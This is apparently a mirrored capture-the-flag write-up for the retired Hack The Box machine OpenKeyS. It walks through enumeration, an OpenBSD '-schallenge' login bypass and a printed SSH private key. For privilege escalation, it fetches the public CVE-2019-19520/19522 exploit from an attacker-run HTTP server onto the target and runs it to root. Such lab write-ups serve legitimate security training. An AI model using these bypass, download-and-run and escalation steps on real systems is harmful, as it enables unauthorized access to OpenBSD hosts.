oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 12:27:02 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Medium/59.md

374 lines
15 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
search:
exclude: true
---
# OpenKeyS Writeup
![](img/59.png)
## Introduction :
OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -sCV -p22,80 10.10.10.199
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST
Nmap scan report for 10.10.10.199
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 which is a simple login page:
![](prg/59_002.png)
Let's enumerate the webservice using gobuster:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt
/includes (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/]
/js (Status: 301) [Size: 443] [--> http://10.10.10.199/js/]
/css (Status: 301) [Size: 443] [--> http://10.10.10.199/css/]
/images (Status: 301) [Size: 443] [--> http://10.10.10.199/images/]
/index.php (Status: 200) [Size: 4837]
/fonts (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/]
/. (Status: 200) [Size: 96]
We found the /includes directory so let's check it from our web browser:
![](prg/59_001.png)
Here we see that we have access to the **auth.php.swp** file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/includes/auth.php.swp
--2021-06-26 21:20:14-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: auth.php.swp
auth.php.swp [ <=> ] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:20:16 (12.8 KB/s) - auth.php.swp saved [12288]
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat auth.php.swp
3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php
@sWB@? mgC
v
p
n
m
U
S
0
J
?>} session_start(); session_destroy(); session_unset();{function close_session()} $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True;{function init_session()} } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds{function is_active_session()} return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<****?php%
So once we download the .swp file we know that this was used by the user jennifer on openkeys.htb (we add it to our hosts file) and that there was a link to **../auth_helpers/check_auth** so we download it after adding openkeys.htb to our hosts file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 openkeys.htb
PING openkeys.htb (10.10.10.199) 56(84) bytes of data.
64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms
--- openkeys.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/auth_helpers/check_auth
--2021-06-26 21:23:30-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: check_auth
check_auth 100%[======================================================================================================================================================>] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:23:32 (12.8 KB/s) - check_auth saved [12288/12288]
We check what kind of file check_auth is:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ rabin2 -I check_auth
arch x86
baddr 0x0
binsz 10495
bintype elf
bits 64
canary false
retguard false
class ELF64
compiler Linker: LLD 8.0.1
crypto false
endian little
havecode true
intrp /usr/libexec/ld.so
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
maxopsz 16
minopsz 1
nx true
os openbsd
pcalign 0
pic true
relocs true
relro partial
rpath NONE
sanitiz false
static false
stripped false
subsys openbsd
va true
So here we see a hint towards **/usr/libexec/ld.so** and after a bit of googling we would stumble upon an authentication bypass using **-schallenge** as the password inside the cookie, so intercept the POST request to the index.php login page we found earlier using burpsuite:
![](prg/59_003.png)
Obviously if we send it as it is we get an authentication denied error:
![](prg/59_004.png)
So let's try the authentication bypass by going through the PHP cookie we mentionned earlier:
![](prg/59_005.png)
We follow the redirection:
![](prg/59_006.png)
And we get a SSH key! Now let's save it locally and use it to login as jennifer:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat pkey
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ chmod 600 pkey
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ ssh -i pkey jennifer@openkeys.htb
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to login via SSH as the user jennifer and get the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc this box let's first enumerate it using linpeas.sh:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ cp /home/nothing/HTB/Admirer/linpeas.sh .
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 333k 100 333k 0 0 66009 0 0:00:05 0:00:05 --:--:-- 80533
openkeys$ chmod +x /tmp/peas.sh
openkeys$ /tmp/peas.sh
` ![](prg/59_007.png)
Let linpeas.sh run a bit and scrolling through the output we stumble upon **xlock**. So that's the hint to lookup for xlock privesc vulnerabilities, and we stumble upon [CVE-2019-19520](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot). So we upload the privesc script onto the box:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys]
→ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4087 100 4087 0 0 4315 0 --:--:-- --:--:-- --:--:-- 4311
openkeys$ file exploit.sh
exploit.sh: Bourne shell script text executable
openkeys$ chmod +x exploit.sh
openkeys$ ./exploit.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions
WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# cat /root/root.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the root user and print the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/59_graph.png)
Reference in a new issue View git blame Copy permalink